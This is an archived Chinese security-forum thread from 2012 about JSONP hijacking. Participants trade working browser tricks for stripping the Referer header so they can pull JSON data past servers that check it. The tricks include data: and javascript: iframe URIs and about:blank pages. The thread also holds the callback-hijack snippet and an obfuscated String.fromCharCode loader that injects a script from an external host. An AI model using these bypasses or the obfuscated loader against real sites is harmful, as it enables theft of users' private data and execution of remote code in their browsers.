json hijack如何丢掉referer

2016-11-1 乌云zone - 永久存档 5130次访问

json hijack如何丢掉referer

请叫我大神 | 2012-08-08 01:37

</script> func(str){


  alert(str)


}

</script> <script src=http://www.xxx.com/xxx.cgi?callback=func ></script>

这种的攻击，如果http://www.xxx.com/xxx.cgi?callback=func 之针对referer 为 xxx.com域或者referer为空的才能出数据。如何绕过？

目前已知的是用一些跨协议的方法，比如https等，有更好的方法么？

1#

蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-08-08 01:54

自己javascript构造get或post试试呢
2#

piao2010 | 2012-08-08 09:41

Ajax是不行的，再往底层一点去，据说WinHttp可以。
3#

piao2010 | 2012-08-08 09:45

另外再引入一个脚本(语言任意，能构造HTTP请求即可)，把相关参数传入，构造的HTTP请求里字段就随便玩了。
4#

xsser | 2012-08-08 10:05

必须浏览器里一层找到方法好像没有特别好的用media player?
5#

Sogili (.) 长短短 (.) | 2012-08-08 10:19

<iframe src="data:text/html,<script src=http://www.baidu.com></script>">
http://jsbin.com/eduyid/
不过IE不支持:(
6#

请叫我大神 | 2012-08-08 11:25

@Sogili 是啊，就是想找个通用的方法
7#

gainover | 2012-08-08 12:56

<iframe id=”aa” src=””></iframe>
<script>
document.getElementById(“aa”).src=’javascript:”<html><body>wooyun.org<scr’+’ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr’+’ipt></body></html>”‘;
</script>
8#

gainover | 2012-08-08 12:56

= = 上面代码好像没显示完整。。。

<iframe id="aa" src=""></iframe> <script> document.getElementById("aa").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(String.fromCharCode(119,105,110,100,111,119,46,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,119,105,110,100,111,119,46,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,53,56,44,52,55,44,52,55,44,49,50,48,44,49,49,53,44,49,49,53,44,49,49,54,44,52,54,44,49,49,53,44,49,48,53,44,49,49,48,44,57,55,44,57,55,44,49,49,50,44,49,49,50,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,48,44,49,49,49,44,52,54,44,49,48,54,44,49,49,53,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,119,105,110,100,111,119,46,115,41))</scr'+'ipt></body></html>"'; </script>
9#

_Evil (科普是一种公益行为) | 2012-08-08 12:56

看热闹学习东西
10#

gainover | 2012-08-08 12:58

原理是利用 xxx.src=’javascript:”HTML代码的方式”‘; 可以去掉refer
11#

_Evil (科普是一种公益行为) | 2012-08-08 12:59

@gainover 你已经超越神了。。。轻松的绕过 0.0 妙
12#

p.z | 2012-08-08 13:14

@gainover 顶
13#

lanz | 2012-08-08 14:29

@gainover 表示IE下还是有referer啊
14#

xsjswt | 2012-08-08 14:31

@xsser 无码无真相，球media player的
15#

Zvall (ฏ๎ฏด้้้้้็็็็็้้้้้็็็็็้) | 2012-08-08 14:34

围观！！！！！！！
16#

Sogili (.) 长短短 (.) | 2012-08-08 14:37

@lanz
<iframe src="javascript:'<script src=http://www.baidu.com></script>'"></iframe>
这样呢?
17#

xsser | 2012-08-08 14:38

@gainover 我要送你乌云币！
18#

gainover | 2012-08-08 15:05

@lanz Wo zheli zhuabao meiyOu refer a…..
19#

Sogili (.) 长短短 (.) | 2012-08-08 15:07

@gainover 我这也有,但用我在楼上留的代码就没有:(
20#

gainover | 2012-08-08 15:21

@lanz @Sogili IE几呢？我IE8 试的是没 refer的。。
21#

insight-labs | 2012-08-08 15:23

@请叫我大神 ftp很好用，火狐不支持，配合@Sogili 的方法做个判断，差不多了！
22#

Sogili (.) 长短短 (.) | 2012-08-08 15:26

@gainover IE8
23#

rayh4c | 2012-08-08 15:34

about:blank页发起的请求没referer
24#

gainover | 2012-08-08 15:35

@Sogili = = 这么奇怪，难道是某个补丁补掉了？
25#

请叫我大神 | 2012-08-08 16:01

@rayh4c show me the code，wtf
26#

also (阿里山的姑娘没水冲凉) | 2012-08-08 16:17

@gainover 膜拜大牛
27#

rayh4c | 2012-08-08 16:38

@请叫我大神 src等于空，都是about:blank页，空白页，在空白页里发起请求当然没referer，关键在于此。
28#

Sogili (.) 长短短 (.) | 2012-08-08 16:58

@rayh4c = = 如果write了就会有referer
29#

rayh4c | 2012-08-08 17:18

@Sogili write会有是DOM对象关联了about:blank页的父窗口的原因，可以找个非about:blank页用这些方法试试，应该会有referer。
30#

Sogili (.) 长短短 (.) | 2012-08-08 17:20

<iframe src="" id=x></iframe> <script defer> x.document.body.innerHTML='-<script defer src=http://www.baidu.com><\/script>'; </script>
31#

rayh4c | 2012-08-08 17:30

@Sogili – -!! 我的意思是你可以找个正常网站用伪协议把下面的代码注进去，肯定会有referer

javascript:'<script src=http://www.baidu.com><\/script>’

你这个代码如果是在非about:blank页肯定会有referer，用DOM调就有父子窗口关系了。
32#

Sogili (.) 长短短 (.) | 2012-08-08 17:34

@rayh4c 我这测试是没有:)
33#

Sogili (.) 长短短 (.) | 2012-08-08 17:37

@rayh4c write有,innerHTML无
34#

rayh4c | 2012-08-08 17:53

@Sogili 确实没有，X动态添加的还是about:blank，Y页write后就不是about:blank了。

<iframe src=”” id=x></iframe>
<script defer>
x.document.body.innerHTML=’-<script defer>alert(\’x:\’+window.parent.x.location)<\/script>’;
</script>

<iframe src=”” id=y></iframe>
<script defer>
y.document.write(‘-<script defer>alert(\’y:\’+window.parent.y.location)<\/script>’);
</script>
35#

Sogili (.) 长短短 (.) | 2012-08-08 18:08

@rayh4c 嗯,的确
36#

gainover | 2012-08-08 22:59

@Sogili 回寝室后，又测试了一下，经过测试，这样写没refer。看来这里不能用JS再动态调用一次，只能直接<script>插入了。
37#

lanz | 2012-08-10 10:15

@Sogili @gainover 伺候好了IE，ff又不干了，此事难两全哪，还是直接用https省事
38#

啤酒 (xx) | 2012-08-10 23:41

要是想拿到返回数据喃？
39#

啤酒 (xx) | 2012-08-10 23:51

@Zvall http://zone.wooyun.org/upload/avatar/avatar_686_b.jpg 头像猜拿到的？